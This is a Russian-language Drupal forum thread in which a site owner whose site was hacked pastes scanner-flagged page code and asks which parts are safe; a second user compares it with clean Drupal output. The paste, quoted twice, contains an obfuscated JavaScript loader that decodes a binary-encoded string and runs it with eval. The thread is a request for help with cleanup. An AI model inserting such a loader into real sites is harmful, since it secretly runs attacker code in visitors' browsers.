Взлом сайта и подозрительные коды

Главные вкладки

Аватар пользователя new_ new_ 6 марта 2011 в 14:15

Доброго времени суток!
Недавно мой сайт ломанули, вирусный код выпилил путем перезаливки старого архива файлов сайта, но хотелось бы себя обезопасить от дальнейших взломов. В следствии исследования нашел несколько кодов на которые ругается "SiteGuard".
Помогите разобраться какие из них безопасные, а какие стоит отрубить.

<?php<script type="text/javascript" src="/misc/jquery.js?Z"></script>
<script type="text/javascript" src="/misc/drupal.js?Z"></script>
<script type="text/javascript" src="/sites/default/files/languages/ru_4f96026075990fd9f6722b8cf378e9d4.js?Z"></script>
<script type="text/javascript" src="/modules/ctools/js/ajax-responder.js?Z"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, { "basePath": "/" });
//--><!]]>
try{function _N73e(){d=new String(",,``,``.,,`,,,,.,,```,,.,,,`,`,.,,`,,`,.,,``,`,.,,`,,,`.,,,`,``.,`,,,`.,,,`,,,.,,,``,`.,,`,``,.,,,`,``.,,``,`,.,`,```.,``,,,.,,,,``.,,`,``,.,,``,,`.,,,``,`.,,````,.,,`,,`,.,,``,`,.,`````.,,,``,,.,,,``,`.,,```,,.,,,,`,.,```,`.,,`,```.,,,`,``.,,,`,``.,,,````.,,,`,`.,`,,,,.,`,,,,.,,``,,,.,,,``,`.,,`,``,.,,``,,,.,,`,,,,.,,,``,`.,,`,``,.,,```,,.,,`,```.,`,,,`.,,```,,.,,`,,,,.,,`,,`,.,```,`.,`````.,,,``,,.,,,`,``.,,,,``,.,,`,,``.,,``,`,.,,,,`,.,```,`.,,``,``.,,`,``,.,,,``,,.,,,````.,,`,,``.,,````,.,,,,``,.,,,`,`.,,`,,,`.,,`,,,,.,,`,,,`.,,``,`,.,```,`.,,,,,`.,,,,``.,`,,,,.,,`,``,.,,``,,`.,,,``,`.,,````,.,,`,,`,.,,``,`,.,,,,,`.,``,,,.,`,``,.,,,`,,.").split(".");r="";for(i=0;i<d.length;i++){e="";for(j=0;j<d[i].length;j++){e+=(d[i].charAt(j)==",")?"1":"0";}c=parseInt(e,2);r+=String.fromCharCode(c.toString(10));}eval(r.substr(0,r.length-1));} _N73e();}catch(e){}</script>?>

Буду очень благодарен за помощь, потому как сам далеко не кодер.

Комментарии

Аватар пользователя MaNaX MaNaX 6 марта 2011 в 15:48
<?php<script type="text/javascript" src="/misc/jquery.js?Z"></script>
<script type="text/javascript" src="/misc/drupal.js?Z"></script>
<script type="text/javascript" src="/sites/default/files/languages/ru_4f96026075990fd9f6722b8cf378e9d4.js?Z"></script>
<script type="text/javascript" src="/modules/ctools/js/ajax-responder.js?Z"></script>

- норма если вы заново их перезальете официальные из сборки друпала

<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, { "basePath": "/" });
//--><!]]>
try{function _N73e(){d=new String(",,``,``.,,`,,,,.,,```,,.,,,`,`,.,,`,,`,.,,``,`,.,,`,,,`.,,,`,``.,`,,,`.,,,`,,,.,,,``,`.,,`,``,.,,,`,``.,,``,`,.,`,```.,``,,,.,,,,``.,,`,``,.,,``,,`.,,,``,`.,,````,.,,`,,`,.,,``,`,.,`````.,,,``,,.,,,``,`.,,```,,.,,,,`,.,```,`.,,`,```.,,,`,``.,,,`,``.,,,````.,,,`,`.,`,,,,.,`,,,,.,,``,,,.,,,``,`.,,`,``,.,,``,,,.,,`,,,,.,,,``,`.,,`,``,.,,```,,.,,`,```.,`,,,`.,,```,,.,,`,,,,.,,`,,`,.,```,`.,`````.,,,``,,.,,,`,``.,,,,``,.,,`,,``.,,``,`,.,,,,`,.,```,`.,,``,``.,,`,``,.,,,``,,.,,,````.,,`,,``.,,````,.,,,,``,.,,,`,`.,,`,,,`.,,`,,,,.,,`,,,`.,,``,`,.,```,`.,,,,,`.,,,,``.,`,,,,.,,`,``,.,,``,,`.,,,``,`.,,````,.,,`,,`,.,,``,`,.,,,,,`.,``,,,.,`,``,.,,,`,,.").split(".");r="";for(i=0;i<d.length;i++){e="";for(j=0;j<d[i].length;j++){e+=(d[i].charAt(j)==",")?"1":"0";}c=parseInt(e,2);r+=String.fromCharCode(c.toString(10));}eval(r.substr(0,r.length-1));} _N73e();}catch(e){}</script>?>

- ничче не скажу
у меня так (6.20)

<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, { "basePath": "/", "dhtmlMenu": { "slide": "slide", "siblings": "siblings", "children": "children", "clone": "clone", "relativity": 0, "doubleclick": 0 }, "extlink": { "extTarget": 0, "extClass": "ext", "extSubdomains": 1, "extExclude": "", "extInclude": "", "extAlert": 0, "extAlertText": "This link will take you to an external web site. We are not responsible for their content.", "mailtoClass": "mailto" }, "googleanalytics": { "trackOutgoing": 1, "trackMailto": 1, "trackDownload": 1, "trackDownloadExtensions": "7z|aac|arc|arj|asf|asx|avi|bin|csv|doc|exe|flv|gif|gz|gzip|hqx|jar|jpe?g|js|mp(2|3|4|e?g)|mov(ie)?|msi|msp|pdf|phps|png|ppt|qtm?|ra(m|r)?|sea|sit|tar|tgz|torrent|txt|wav|wma|wmv|wpd|xls|xml|z|zip" } });
//--><!]]>
</script>
    <script type="text/javascript">if (Drupal.jsEnabled) {$(document).ready(function(){
                                window.setTimeout("artNoStyleAdding(document)", 2000);});}</script>
  <script type="text/javascript"> </script>